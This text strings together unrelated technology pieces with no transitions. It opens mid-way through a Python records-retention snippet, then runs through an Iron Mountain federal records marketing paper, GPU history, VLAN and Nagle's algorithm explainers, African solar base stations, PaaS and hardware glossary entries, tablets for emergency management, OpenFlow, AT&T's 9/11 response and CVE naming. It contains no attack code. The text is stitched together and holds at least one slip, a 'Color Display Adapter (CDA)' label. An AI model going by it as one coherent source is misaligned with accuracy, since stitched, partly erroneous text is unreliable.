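RETENTION_YEARS = {"correspondence": 3, "case-file": 30}  # illustrative values

def is_eligible_for_disposal(series, created, fmt, today):
    """Return True when a record has aged past its series' retention period.

    The same rule fires whether fmt is 'paper' or 'electronic'; format
    only affects *how* disposal is carried out, never *whether*.
    """
    years = RETENTION_YEARS[series]
    return today >= created.replace(year=created.year + years)

# A paper record and an electronic record in the same series are
# judged by the same clock.
today = date(2014, 1, 1)
print(is_eligible_for_disposal("correspondence", date(2009, 5, 1), "paper", today))       # True
print(is_eligible_for_disposal("correspondence", date(2012, 5, 1), "electronic", today))  # False
```

The point of the sketch is the single code path: a uniformly applied rule is what makes later holds and destructions defensible.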
A discussion guide for Records Unification
The following questions are designed to facilitate discussion among records managers, IT managers and compliance managers:
- When it comes to unifying our physical and electronic records, which of the following challenges present the biggest obstacles for our agency: explosive digital record growth, social media, unclear leadership or ownership, the managing of legacy records, or the application of an appropriate retention policy? Are there other challenges that present similar problems?
- What is the greatest benefit to be gained if we were to unify our records? How could this benefit be tangibly demonstrated to senior agency leadership?
- Do we already have enterprise content management systems that offer records management capabilities, and, if so, how are we currently employing them?
- What challenges have we encountered while trying to connect systems so they can share common policies?
Driving Operational Improvements
Unifying electronic and physical records can bring significant operational productivity to government institutions. Such productivity includes:
By establishing a single policy to uniformly address both electronic and paper records, any organization can achieve economies of scale in training employees and in making adjustments to its policies. Why? Such practices and changes can now be rolled out at the same time across the entire organization. For Continuity of Operations Plans (COOP), each agency gains the ability to find and recover vital records when they are most needed.
With all records subject to the same policy management and enforcement, employees can become practiced at finding and accessing records as needed for FOIA, e-Discovery or other regulatory requirements. The potential costs of e-Discovery will decrease, as will the costs associated with finding, accessing and producing documents in a timely manner.
By applying policies consistently to records of all types across the enterprise, federal agencies can have a much more defensible position for both legal holds and the destruction of records. According to Iron Mountain’s research, an impressive 60% of organizations reported having aligned governance policies for electronic and physical records, but only 33% reported an alignment on policy application for holds and destructions across all media types.6
Caring for all platforms:
The Iron Mountain® Federal Information Asset Framework is designed to help federal IT and RM professionals gain control over the entire information management process. It combines Iron Mountain’s proven services with best-of-breed partnerships that integrate ECM and cloud platforms, creating a program with better access and search capabilities to speed e-Discovery and FOIA response and to increase overall productivity for agencies in meeting their missions.
By 2019, federal agencies are required to manage all permanent electronic records in electronic format in order to achieve compliance with the Presidential Directive on Managing Government Records.
During NARA’s Industry Day on September 11, 2013, officials estimated that only two to three percent of federal records should be considered permanent. Iron Mountain can help agencies digitize their mission critical permanent records, while helping to effectively manage the remaining 97% of records that fall into the “temporary” category.
To get the job done, agencies must start now. This is why Iron Mountain developed the Federal Information Asset Framework (please visit http://programs.ironmountain.com/content/IMNAFederalVirtualToolkit for more details).
With a comprehensive records management plan in place, agencies can expect to meet all pertinent directive deadlines and discover added savings. Such a plan can be implemented through careful review of current records management practices. This type of assessment aids agency leaders in achieving their buy-in on modernization while allowing them to work with industry partners to uncover cost savings for both physical and digital record management.
Iron Mountain is committed to applying a well-designed management methodology to empower federal agencies. We can help you unify current systems that collect and digitize records using a prudent conversion schedule to help prepare for Enterprise Content Management (ECM) system use.
By partnering with Iron Mountain, agencies gain the resources and expertise of the world’s leading records management provider. Iron Mountain can help design and execute the procedures necessary to store records in secure, environmentally controlled, CFR-compliant facilities. And, should disaster strike, agencies working with Iron Mountain can rest assured they will be able to retrieve vital information and implement Continuity of Operations Plans (COOP) while continuing to serve constituents and meet mission objectives.
Iron Mountain stands ready to assist you and your organization as a trusted adviser for total records and information management unification. Regardless of your agency’s starting point within the framework — whether you need help determining which records to digitize, migrating to electronic records management or securing storage to maintain your agency’s vital information assets — Iron Mountain and our partners can help you transform your operations. This will empower you to effectively support the needs of your agency’s stakeholders and constituents alike and can help you fully address the records directive.
There is no better time to take action toward a unified information management plan. Visit http://programs.ironmountain.com/content/IMNAFederalVirtualToolkit today.
1 “The Digital Universe in 2020: Big Data, Bigger Digital Shadows, and Biggest Growth in the Far East,” IDC, December 2012. 2 “Big Data or Too Much Information?” Smithsonian, May 7, 2012. 3 NARA Records Management Self-Assessment, http://www.archives.gov/records-mgmt/resources/self-assessment-2012.pdf. 4 MeriTalk, December 2013. 5 Ibid. 6 “Federal Records and Information Management: Ready to Rumble?” MeriTalk, December 2013.
What do the Atari 2600 and Tianhe-1 have in common? It may be difficult to imagine, but both systems are examples of the use of cutting-edge graphics processors for their times. This demonstrates the fascinating evolution of the GPU, which today is one of the most critical hardware components of supercomputer architectures.
Techspot’s Graham Singer recently put together a compelling series on the history of the GPU, stretching from the earliest 3D work in the 1950s through today’s GPGPU market. Singer broke his history into four distinct stories.
Singer’s first installment looked at the early days of 3D consumer graphics, a period that lasted from 1976 to 1995. Although 3D graphics systems were being built as early as 1951, when MIT built the Whirlwind flight simulator for the Navy, it was the graphics systems that developers created for the burgeoning consumer computer market in the mid-1970s that formed the foundation for today’s GPU, Singer writes.
The “Pixie” video chip that RCA built in 1976 was capable of outputting a video signal at a resolution of 62×128. 1977 saw the release of the Atari 2600 game system, which included the Television Interface Adapter (TIA) 1A. Motorola followed suit a year later with the MC6845 video address generator, which became the basis for the Monochrome and Color Display Adapter (MDA/CDA) cards that IBM started using in its PC of 1981.
The Enhanced Graphics Adapter (EGA) developed by Chips and Technologies began to provide some competition to the MDA/CDA cards in 1985. The same year, three Hong Kong immigrants formed Array Technology Inc. The company, which soon changed its name to ATI Technologies Inc., would lead the market for years with its Wonder line of graphics boards and chips.
In 1992, SGI released OpenGL, an open API for 2D and 3D graphics. As OpenGL gained traction in the workstation market, Microsoft attempted to corner the emerging gaming market with its proprietary Direct3D API. Many other proprietary APIs were introduced, such as the Matrox Simple Interface, the Creative Graphics Library, ATI’s C Interface, and others, but they would eventually fall by the wayside.
Meanwhile, the early 1990s was a period of great volatility in the graphics market, with many companies being founded and then acquired or going out of business. Among the winners founded during this time was Nvidia.
The second epoch in Singer’s series lasts from 1995 to 1999, and is characterized by the utter domination of the market by 3DFx’s Voodoo graphics card, which launched in November 1996 and soon came to account for about 85 percent of the market. Cards that could only render 2D were made obsolete nearly overnight, Singer writes.
3DFx went public in 1997, but the launch of its budget-minded Voodoo Rush board was a flop. And in a bid to boost profits, the company decided to market and sell graphics boards itself, which further helped competitors, including Rendition, ATI, and Nvidia.
Nvidia laid the groundwork for future success with the 1997 launch of the RIVA 128 (Real-time Interactive Video and Animation accelerator), which featured Direct3D compatibility and topped several performance benchmarks. By the end of 1997, Nvidia had nearly 25 percent of the graphics market. Nvidia was sued by SGI in 1998, but Nvidia emerged stronger after the settlement in 1999, in which SGI gave Nvidia access to its professional graphics portfolio. This amounted to a “virtual giveaway of IP” that hastened SGI’s bankruptcy, Singer writes.
The battle between ATI and Nvidia marks Singer’s third era of the GPU’s history, which lasted from 2000 to 2006. During this period, 3dfx became increasingly irrelevant, as its cards, such as the Voodoo 4 4500, could not keep up with the graphics performance offered by Nvidia’s GeForce 2 GTS and ATI’s Radeon DDR.
Nvidia and ATI would go head to head and deliver graphics cards with features that are now commonplace, such as the capability to perform specular shading, volumetric explosion, refraction, waves, vertex blending, shadow volumes, bump mapping and elevation mapping.
The coming of general-purpose GPUs began in 2007, which kicks off the fourth era of Singer’s GPU history. Both Nvidia and ATI (since acquired by AMD) had been cramming ever more capabilities into their graphics cards, and the practice of using these cards for HPC workloads became common.
But the two companies would take different tracks to GPGPU, with Nvidia releasing its CUDA development environment, and AMD using OpenCL. Nvidia gained considerable market- and mindshare in the HPC market with the launch of the Tesla, the first dedicated GPGPU.
The design of a layer-2 switched network is essentially flat. Every device on the network sees the transmission of every broadcast packet, even if it does not need to receive the data.
The Structure of a Flat Network
Routers permit broadcasts within the originating network only, but switches forward broadcasts to each and every segment. The network is called flat not because of its physical design but because it forms a single broadcast domain. As shown in the figure, a broadcast by Host A is forwarded to all ports on all switches except the port that originally received it.
In the second figure you can see a switched network sending a frame from Host A with Host D as its destination. Notice that the frame is forwarded out only the port where Host D is located. This is a great improvement over the old hub networks; you would only dislike it if, for some reason, you wanted a single collision domain by default.
So, the biggest advantage of a layer-2 switched network is that it creates a dedicated collision domain for every single device connected to the switch. As a result, larger networks can be built, and the old Ethernet distance constraints no longer apply. That does not mean it is completely free of issues: as the number of devices and users grows, each switch has to deal with more packets and broadcasts.
Security is another issue within the typical layer-2 switched internetwork, because all devices are visible to all users. It is not possible to stop devices from broadcasting, nor to stop users from responding to those broadcasts. Security options are limited to placing passwords on servers and other devices. That changes once you establish virtual LANs: many of the issues associated with layer-2 switching can be solved with VLANs. VLANs ease network management in a number of ways:
- VLANs can organize a network into a number of logical subnets, each forming its own broadcast domain.
- Adds, moves and changes are achieved simply by configuring a port into the appropriate VLAN.
- A group of users that demands high security can be placed in its own VLAN, so that users outside the VLAN cannot communicate with them.
- VLANs group users logically by function, independent of their physical or geographic locations.
- VLANs can also enhance network security.
- VLANs increase the number of broadcast domains while decreasing their size.
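To make the broadcast-domain idea concrete, here is a small, purely illustrative Python model of a switch (not any real switch software): a broadcast entering one port is flooded to every other port in the same VLAN, and a flat network is just the special case where every port belongs to one VLAN.

```python
def flood_broadcast(port_vlan, ingress_port):
    """Return the ports a broadcast frame is flooded to.

    port_vlan maps port number -> VLAN id. A broadcast entering on
    ingress_port is forwarded to every other port in the same VLAN.
    """
    vlan = port_vlan[ingress_port]
    return sorted(p for p, v in port_vlan.items() if v == vlan and p != ingress_port)

# Flat network: one broadcast domain -- every port sees the broadcast.
flat = {1: 1, 2: 1, 3: 1, 4: 1}
print(flood_broadcast(flat, 1))   # [2, 3, 4]

# The same switch carved into two VLANs: the broadcast stays in VLAN 10.
vlans = {1: 10, 2: 10, 3: 20, 4: 20}
print(flood_broadcast(vlans, 1))  # [2]
```

The second call shows the size-versus-count trade-off from the last bullet: two broadcast domains instead of one, each half the size.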
How Nagle’s algorithm makes TCP/IP better, and when it is OK to use it. Truth be told, Nagle should be avoided in today’s high-speed networks.
This article is not about mathematics, don’t be afraid. I’m running a networking blog and it’s not my intention to speak or write about anything related to mathematics. The biggest math problems that I’ve done in the last few years are some simple subnetting and EIGRP metric calculations, and that is where I stopped with math for now.
On the other hand, I love the theory behind algorithms, especially if the algorithm is used in networking and is as simple and powerful as Nagle’s algorithm.
As you can guess, John Nagle is the name of the fellow who created the algorithm. He found a solution for a TCP/IP efficiency issue also known as the “small packet problem”.
Here’s what happens:
If you decide to send, let’s say, one single letter across the network to some destination, your machine will probably take that one letter and send it immediately across the network, right?
Ok, a bit of math now. One letter or any other single character, when converted to binary, takes one byte of data. For example, in the ASCII table the letter “A” is stored as the byte 01000001.
Ok, so if you decide to send one single letter across the network, your PC will take that one byte of data and encapsulate it with 40 bytes of header.
40 bytes is the normal size of the headers: 20 bytes for TCP and 20 bytes for IPv4.
You can see that we will have 4000% header overhead, given that the payload could be as large as 1460 bytes and we are sending only one byte. Either way the header stays the same size. A 40-byte header on a 1460-byte payload is not a big overhead, but a 40-byte header on 1 byte of payload is pretty bad.
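You can check the arithmetic yourself. A quick Python sketch, assuming the 40-byte TCP+IPv4 header from above and a 1460-byte full payload:

```python
HEADER = 40  # bytes: 20 TCP + 20 IPv4, no options

def header_overhead_pct(payload_bytes):
    """Header size as a percentage of payload size."""
    return 100.0 * HEADER / payload_bytes

print(header_overhead_pct(1))     # 4000.0 -> a one-character telnet packet
print(header_overhead_pct(1460))  # about 2.7 -> a full-sized TCP segment
```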
One example of an application that sends characters one by one across the network is Telnet. Telnet will send each character as you type it. Over slow links, many Telnet packets will be in transit at the same time, making the link congested.
Nagle came up with a great idea. Small outgoing data pieces are buffered, combined together and sent out all at once in one single packet. In detail: as long as the client is waiting for the acknowledgement of a previously sent packet, it will not send another small packet; data is buffered until either the acknowledgement arrives or enough data accumulates to fill a complete packet (up to the maximum payload size).
if there is new data to send
    if the window size >= MAXPAYLOAD and available data is >= MAXPAYLOAD
        send complete MAXPAYLOAD segment now
    else
        if there is unconfirmed data still in the pipe
            enqueue data in the buffer until an acknowledge is received
        else
            send data immediately
        end if
    end if
end if
where MAXPAYLOAD = maximum segment size.
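The same logic can be transcribed into a few lines of Python. This is only a sketch of the sender-side decision, not part of a real TCP stack:

```python
def nagle_decision(new_data, window, unacked_in_flight, MAXPAYLOAD=1460):
    """Decide what a Nagle-enabled sender does with newly written data.

    new_data and window are byte counts; unacked_in_flight is True while
    a previously sent segment is still waiting for its acknowledgement.
    Returns 'send-full-segment', 'buffer', or 'send-now'.
    """
    if window >= MAXPAYLOAD and new_data >= MAXPAYLOAD:
        return "send-full-segment"  # enough data for a complete packet
    if unacked_in_flight:
        return "buffer"             # wait for the ACK and coalesce small writes
    return "send-now"               # pipe is idle: no reason to delay

print(nagle_decision(new_data=1, window=65535, unacked_in_flight=True))     # buffer
print(nagle_decision(new_data=1, window=65535, unacked_in_flight=False))    # send-now
print(nagle_decision(new_data=2000, window=65535, unacked_in_flight=True))  # send-full-segment
```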
Nagle’s algorithm works by intentionally delaying packets. By doing this it increases bandwidth efficiency at the cost of increased latency.
Time-sensitive applications that need real-time interaction with the destination can use the TCP_NODELAY socket option to bypass the Nagle delay, or simply use UDP.
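In Python, for example, disabling Nagle is a single socket option set through the standard socket API:

```python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# TCP_NODELAY=1 tells the stack to send small writes immediately
# instead of buffering them behind an unacknowledged segment.
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
print(s.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY))  # non-zero: Nagle is off
s.close()
```

The equivalent option exists in every mainstream socket API, since TCP_NODELAY is defined by the sockets standard rather than by any one language.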
Today’s networks with huge throughput are not the place where you should use Nagle’s algorithm. Most applications today are real-time apps that communicate with the server all the time, with responses expected instantly by the user. With non-blocking network devices and 10G network speeds, any kind of intentional delay is unwelcome.
African mobile-service providers are tapping into solar energy to power base stations and connect users in remote areas to mobile networks.
Africa's largest mobile telecommunication company, MTN (Mobile Telecommunication Network), and the East African regional service provider Safaricom are using solar energy and bio-fuel, the companies have announced. MTN operates in 21 African countries, including Zambia, Uganda, Nigeria, Ghana and South Africa.
Lack of access to electricity in rural areas has always been blamed for sparse mobile connectivity in more remote parts of Africa. Mobile service providers have also been unwilling to invest in some areas that have electricity because frequent power failures increase costs.
Solar-energy-powered base stations are already used in Malawi and Morocco where telecommunication equipment manufacturer Ericsson has developed solar-powered base stations for rural areas without access to electricity. And in Namibia the country's mobile telecommunication company, MTC, is trying solar-powered base stations as well.
Ericsson and MTN are also developing a project to power base stations using bio-fuels from palm and pumpkin seeds.
"MTN wants to use clean technologies that are environmentally friendly," said Fred Mokoena, MTN Zambia chief sales and marketing officer.
Statistics from the International Telecommunication Union (ITU) indicate that Africa uses about 30 million liters of diesel every year to power mobile base stations. But ever-rising fuel prices raise operating costs and negatively affect the environment.
The ITU suggests that African governments should help accelerate the continent's mobile-phone connectivity by offering import duty waivers and tax reductions to local companies supplying equipment based on renewable energy to mobile operators.
Two months ago, the Zambian government zero-rated the importation of solar systems and other renewable energy equipment to make it easier and cheaper for local companies to supply solar energy equipment in the country.
DELL EMC Glossary
What is Platform as a Service (PaaS)?
Platform as a Service (PaaS) is a cloud-based environment in which you can develop, test, run and manage your applications. This approach delivers the development environment you need, without the complexity of buying, building or managing the underlying infrastructure. As a result, you can work faster and release your applications quicker.
Who uses PaaS and why?
Developers look to PaaS to go to market faster, innovate and experiment with new technologies using existing public, private or hybrid cloud infrastructures.
How does PaaS work?
PaaS enables developers to accelerate the pace of applications developments while reducing complexity. Users can provision, deploy and manage applications using one unified management system.
What are the benefits of PaaS?
PaaS enables the creation and deployment of web-based application software without the cost and complexity of buying and managing underlying hardware, operating software, and utilities. The PaaS environment provides the entire IT resource stack as a service. It provides all of the facilities required to support the complete lifecycle of building and delivering web-based applications.
After heavy hail hit 150 homes in Montgomery County, Ky., last March, the county’s emergency management director, Wesley Delk, set out to assess the damage. A key tool: an Android-based tablet computer that he used to take notes as well as geotag photos. He was able to add the pictures to a map later, showing where damage had occurred.
Delk and his deputy both use tablets for their daily work. “Now it’s engrained into the processes that we do,” he said. But it took about a year from the time Delk first started experimenting with work uses for his personal iPad until it became department policy to issue tablets.
Tablet computers are single-panel touchscreen computers that are smaller than a laptop but larger than a phone. Apple’s iPad made tablets popular with the public, and now users can choose from several consumer options: iPads, BlackBerry devices, Windows tablets or those that run Google’s Android operating system. Smaller tablets, such as Amazon’s Kindle Fire and Apple’s iPad Mini, also are available. And first responders whose work environment would be too hard on a consumer tablet can consider rugged tablets that are more durable.
Tablets are increasingly being adopted by the emergency management community for everything from note taking to sending warnings from the field. Tablets’ mobility and connectivity are big advantages.
The National Library of Medicine has a Web page with links to government and nonprofit mobile apps for emergency managers.
There are many options for using tablets to make emergency management work more efficient:
When Bartlett gets a warning about a severe weather watch, he opens a weather app to check the radar. He also uses a free GIS app that helps to measure distances. When a hazardous chemical spill occurred near campus, Bartlett pulled up weather information on his tablet to find out the wind direction. He looked up the isolation distances for the chemical that had spilled and used a GIS app to measure how far the chemical was from the nearest campus building.
“It was unprecedented to have all of that information and tools available at your fingertips, using one single tool,” Bartlett said.
One of the key attractions of tablets is that many tools people use at home can also help at work, including video-conferencing applications, GPS tools and file sharing services like Dropbox.
“Nobody designed Google as an emergency response tool, and yet it’s difficult to imagine many emergency responders who don’t frequently use Google as part of their job,” Botterell said.
There are, however, specialized apps for emergency managers. Cargo Decoder, for example, is a searchable version of the Emergency Response Guidebook that is distributed by transportation authorities in the United States, Canada and Mexico. A user can type in the four-digit code from the side of a truck or tanker and get more information about how to handle the substance inside in an emergency.
Unlike the printed version of the guidebook, the electronic version is searchable by the name of the substance, the four-digit code, or just part of the four-digit code.
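Such a lookup is straightforward to sketch in code. The example below is illustrative only — the entries are a tiny made-up sample, not actual guidebook data — and matches either a code prefix or a fragment of the substance name:

```java
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

// Sketch of the kind of partial-code lookup the article describes.
// The entries below are a small illustrative sample.
public class GuidebookSearch {
    static final Map<String, String> ENTRIES = new LinkedHashMap<>();
    static {
        ENTRIES.put("1203", "Gasoline");
        ENTRIES.put("1075", "Liquefied petroleum gas");
        ENTRIES.put("1824", "Sodium hydroxide solution");
    }

    // Match by full code, code prefix, or substance-name substring.
    public static List<String> search(String query) {
        List<String> hits = new ArrayList<>();
        String q = query.toLowerCase();
        for (Map.Entry<String, String> e : ENTRIES.entrySet()) {
            if (e.getKey().startsWith(q) || e.getValue().toLowerCase().contains(q)) {
                hits.add(e.getKey() + " " + e.getValue());
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        System.out.println(search("12"));   // partial code
        System.out.println(search("gas"));  // name fragment
    }
}
```

A real app would search the full guidebook dataset, but the matching logic is essentially this simple.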
“It’s a way of getting to the information you want as quickly as possible,” said Marsh Gosnell, founder of Strategies In Software in East Windsor, N.J. He made the Android version of the app in 2010 and an iOS version last year.
The National Library of Medicine, part of the National Institutes of Health, has created a mobile app called the Wireless Information System for Emergency Responders (WISER) that allows responders to identify unknown substances (searching by characteristics such as smell, color and human exposure symptoms). It can also produce a map showing the protective distance around a substance, measured from the user’s current location or from an address the user provides.
“First responders and hazmat professionals have only a few minutes to be able to get the information they really need, so we try to put it in an easily digestible form,” said Jennifer G. Pakiam, a technical information specialist with the Disaster Information Management Research Center at the National Library of Medicine.
As more emergency management professionals start using tablets, demand will grow for even more specialized apps.
“I think there are going to be a lot of new products coming soon because more agencies are adopting the platforms,” Delk said. “That’s giving additional incentive to the developers to make the products we need.”
For emergency management departments considering tablets, there are possible downsides to consider. One is security: anytime you send data over a cellular network, it could be at risk, especially if it’s not encrypted. “Your data is out there; it’s traveling from one point to another by the Internet,” Delk said.
For some emergency responders, the visual interface of a tablet computer may be a hindrance, Botterell said. Firefighters and police officers, for example, may want to “keep their eyes on the situation” and use a device with a voice-activated interface instead.
Another issue related to cost is network reliability. Commercial networks may not always have enough capacity for a surge in use during an emergency. “How much money are the wireless carriers spending on capacity and battery backup systems and all of the marginal investments that affect system reliability?” Botterell said.
Emergency management professionals who decide to use tablets face a new set of decisions: what type to get.
Because the specific features available are constantly changing, it’s best to evaluate the pros and cons (including features like camera technology, Wi-Fi capability and ease of use) of the models available at the time of purchase. Compatibility with your office computers may be less important than compatibility with smartphones you already have, since many apps run on both smartphones and tablets.
Those who are concerned about durability may want to look into rugged tablets, made to meet military specifications. MobileDemand’s T7200 has a 7-inch screen, for example, and can withstand being dropped on concrete, being put underwater, and being stored in extreme cold and heat. MobileDemand’s tablets cost between $1,900 and $3,800 depending on the configuration.
MobileDemand’s primary customers for these tablets are EMS, fire and police departments, as well as the military. “If they’re an indoor user, they’re calling the wrong number,” said Wayne Randolph, U.S. public sector manager for MobileDemand, in Hiawatha, Iowa.
The options are continually expanding, both for devices and for the apps that make emergency managers’ lives easier.
“There’s wonderful stuff being done, and we’ve just begun to explore the possibilities,” Botterell said.
Tech Glossary – D
DDR (Double Data Rate)
Stands for “Double Data Rate.” It is an advanced version of SDRAM, a type of computer memory. DDR-SDRAM, sometimes called “SDRAM II,” can transfer data twice as fast as regular SDRAM chips. This is because DDR memory can send and receive signals twice per clock cycle. The efficient operation of DDR-SDRAM makes the memory great for notebook computers since it uses up less power.
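The “twice per clock cycle” point translates directly into arithmetic: at the same clock frequency, DDR memory performs twice as many transfers per second as single-data-rate memory. A minimal illustration (the 133 MHz clock is just an example figure):

```java
public class DdrRate {
    // Single data rate: one transfer per clock cycle.
    public static long sdrTransfers(long clockHz) { return clockHz; }

    // DDR moves data on both the rising and falling edge of the clock,
    // so it completes two transfers per cycle.
    public static long ddrTransfers(long clockHz) { return 2 * clockHz; }

    public static void main(String[] args) {
        long clock = 133_000_000L; // a 133 MHz memory clock, for illustration
        System.out.println("SDR: " + sdrTransfers(clock) + " transfers/s");
        System.out.println("DDR: " + ddrTransfers(clock) + " transfers/s");
    }
}
```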
DDR2 (Double Data Rate 2)
DDR2 RAM uses a different design than DDR memory. The improved design allows DDR2 RAM to run faster than standard DDR memory. The modified design also gives the RAM more bandwidth, which means more data can be passed through the RAM chip at one time. This increases the efficiency of the memory.
Defragment
Adding and deleting files from your hard disk is a common task. Unfortunately, this process is not always done very efficiently. If you have a ton of “fragmented” files on your hard disk, you might hear extra grinding, sputtering, and other weird noises coming from your computer. Defragmenting your hard disk is a great way to boost the performance of your computer.
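The performance cost comes from files being split across non-contiguous runs of disk blocks, forcing extra head movement. As a simplified illustration, fragmentation can be measured by counting the breaks in a file's block sequence:

```java
public class FragmentationCheck {
    // A file stored in blocks 7,8,9 is contiguous (1 fragment);
    // blocks 7,9,10 form 2 fragments the disk head must seek between.
    // The block list is taken in the file's logical order.
    public static int countFragments(int[] blocks) {
        if (blocks.length == 0) return 0;
        int fragments = 1;
        for (int i = 1; i < blocks.length; i++) {
            if (blocks[i] != blocks[i - 1] + 1) fragments++;
        }
        return fragments;
    }

    public static void main(String[] args) {
        System.out.println(countFragments(new int[]{7, 8, 9}));      // contiguous
        System.out.println(countFragments(new int[]{7, 9, 10, 42})); // fragmented
    }
}
```

A defragmenter's job, in essence, is to rearrange blocks until this count approaches 1 for each file.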
Driver
A driver is a small file that helps the computer communicate with a certain hardware device. It contains information the computer needs to recognize and control the device. In Windows-based PCs, a driver is often packaged as a dynamic link library, or .DLL file. On Macs, most hardware devices don’t need drivers, but the ones that do usually come with a software driver in the form of a system extension, or .KEXT file.
Dual-Core Processor
A dual-core processor is a CPU with two processors or “execution cores” in the same integrated circuit. Each processor has its own cache and controller, which enables it to function as efficiently as a single processor. However, because the two processors are linked together, they can perform operations up to twice as fast as a single processor can.
Networks can be virtualized, but most are not. Network infrastructure springs from hardware design concepts that predate the concept of virtualization. Even the "virtual" local area network must be defined in hardware, when it should be set in software.
In many cases, switches, routers, and controllers depend on their embedded spanning tree algorithms. Spanning tree is an algorithmic determination of the most efficient path for a message to follow in a given network, and it results in a hierarchy of devices. After the mapping is implemented, not a lot more can be done. Spanning tree is built in, and each device knows its place in the map. That leaves the network calcified in place, unyielding to momentary demands and resistant to taking on an assignment of different characteristics.
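As a rough illustration of the idea (real STP elects a root bridge and weighs link costs, both of which this sketch ignores), a breadth-first search over a network topology produces exactly such a hierarchy: every device gets one loop-free path back to the root, and redundant links go unused:

```java
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

// Much-simplified stand-in for what spanning tree computes: starting from
// a root switch, fix one loop-free path to every other device. Returns a
// map of device -> parent device (null for the root).
public class SpanningTreeSketch {
    public static Map<String, String> buildTree(Map<String, List<String>> links, String root) {
        Map<String, String> parent = new LinkedHashMap<>();
        parent.put(root, null);
        Deque<String> queue = new ArrayDeque<>();
        queue.add(root);
        while (!queue.isEmpty()) {
            String device = queue.remove();
            for (String neighbor : links.getOrDefault(device, List.of())) {
                if (!parent.containsKey(neighbor)) { // skip links that would form a loop
                    parent.put(neighbor, device);
                    queue.add(neighbor);
                }
            }
        }
        return parent;
    }

    public static void main(String[] args) {
        Map<String, List<String>> links = Map.of(
            "core", List.of("sw1", "sw2"),
            "sw1", List.of("core", "sw2", "host"),
            "sw2", List.of("core", "sw1"),
            "host", List.of("sw1"));
        System.out.println(buildTree(links, "core"));
    }
}
```

Once computed, the hierarchy is fixed — which is precisely the rigidity the article is describing.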
As sleeping virtual machines come to life, or reach peaks of operation during the workday, it would be nice to be able to allocate and reallocate their network resources, based on where the traffic is. For that matter, when a new virtual machine is spun up in three minutes, it would be great to get its network allocation at the same time instead of waiting three days for a network engineer to rig its network services. Why can't automated policies be applied to the VM's networking, like those for CPU, memory, and storage? Those policies are already in place and ready to be implemented at the moment of a VM's creation. Why is networking a holdout?
The reason is there are still barriers to treating networking as a programmable or software-defined resource. The virtualization phase that has swept through the data center is still washing up on networking concepts expressed as devices hard-wired together. What's needed is to free the network from the underlying hardware. It should be a more malleable entity that can be shaped and reshaped as needed. Part of the purpose for lifting the network definition above the hardware is to escape the limitations of the spanning tree algorithm, so useful in its day, now outmoded by virtualization.
Escape from spanning tree can be done if your network vendor supplies virtualization management atop its hardware devices, but then you must use one vendor's equipment exclusively. Most enterprise networks are a mix, making virtualization harder to implement. So what's really needed is a separation of the switching control plane, currently the spanning tree algorithm's fiefdom, from its direct link to the hardware. By allowing a new set of policies or flexible algorithms to run the hardware, we can adapt the network to the world of virtualization.
One way to do so is to adopt a much more flexible approach to network algorithms called OpenFlow, from a research project at Stanford. The difference between spanning tree and OpenFlow is summed up in a statement by Guido Appenzeller, CEO of the startup Big Switch Networks and a director of the Clean Slate research project on network redesign at Stanford: "I don't want to configure my network. I want to program my network," he said in an interview. Appenzeller said he's just echoing a statement he heard from James Hamilton, distinguished engineer at Amazon Web Services. There is an awareness of how applications have been separated by virtualization from the hardware and a widespread wish that something similar would happen with networks.
"Networking needs a VMware," said Kyle Forster, a co-founder of Big Switch and vice president of sales and marketing. Big Switch was created to fill that ambition--founded to take advantage of the OpenFlow protocol that came out of Stanford's Clean Slate project in 2008 and backed with $11 million in venture capital, for starters.
World Trade Center Disaster Response
AT&T's Network Disaster Recovery (NDR) Team was activated immediately following the destruction of the World Trade Center towers on the morning of September 11, 2001. The team was deployed to support the recovery of damaged AT&T network facilities and to provide emergency communications for the relief effort in lower Manhattan.
An Emergency Communications Vehicle (ECV) was deployed to NYPD's backup command center in lower Manhattan. The ECV provided telephone service for administrative use and for use by the families of missing NYPD members. The ECV was in service at NYPD headquarters from Wednesday, September 12, until Friday, September 21.
On September 21, the ECV was moved so it could provide free telephone service for relief workers at the WTC disaster site. Phone lines from the ECV were brought into the Spirit of New York, a dinner cruise ship moored in North Cove Yacht Harbor, adjacent to the World Financial Center. The ship was converted for use as a food and rest station for the rescue workers. The ECV remained in service there until Thursday, October 4.
Over 20,000 calls were placed over the ECV link at the NYPD deployment and over 36,000 calls were placed during the Spirit of New York deployment.
Common Vulnerabilities and Exposures (CVE)
In information security jargon, vulnerabilities refer to potential openings for attack or system penetration based on possibly flawed or erroneous design decisions, protocol implementations, software characteristics and other matters, whereas exposures address ways to obtain unauthorized access to systems, such as through system fingerprinting and scanning, that not everyone may agree also constitute vulnerabilities. In fact, there’s a fascinating discussion on this terminology and why it’s important available on the CVE site—very much worth reading for those interested in why there’s so much fuss about names and terms.
The goal of the CVE list is to create a common lexicon of names for vulnerabilities and exposures, so that all who work in the area can agree on a common set of terms. Potential terms are submitted for editorial review by the CVE board, granted specific identifiers, linked to technical descriptions and associated with relevant security alerts, bulletins, reports and other documents that identify and describe them. For example the Sasser worm currently bears the CVE cognomen CAN-2003-0533. This may be decoded as follows: “This is a candidate (CAN) item submitted in 2003 with entry number 0533.” On its Web page, you’ll also find pointers to relevant CERT, Microsoft, EEYE and BugTraq documents that describe the Local Security Authority vulnerability that lets the Sasser worm do its thing.
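The decoding rule described above is mechanical enough to sketch in code. The small class below is illustrative only (it is not part of any official CVE tooling); it splits an identifier into the three fields the article decodes — status (CAN for candidate, CVE for an accepted entry), year, and entry number:

```java
// Splits an identifier like CAN-2003-0533 into status, year, and number.
public class CveId {
    public final String status;
    public final int year;
    public final int number;

    public CveId(String id) {
        String[] parts = id.split("-");
        if (parts.length != 3) {
            throw new IllegalArgumentException("expected STATUS-YEAR-NUMBER: " + id);
        }
        status = parts[0];
        year = Integer.parseInt(parts[1]);
        number = Integer.parseInt(parts[2]);
    }

    public static void main(String[] args) {
        CveId sasser = new CveId("CAN-2003-0533");
        System.out.println(sasser.status + " item submitted in " + sasser.year
                + ", entry number " + sasser.number);
    }
}
```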
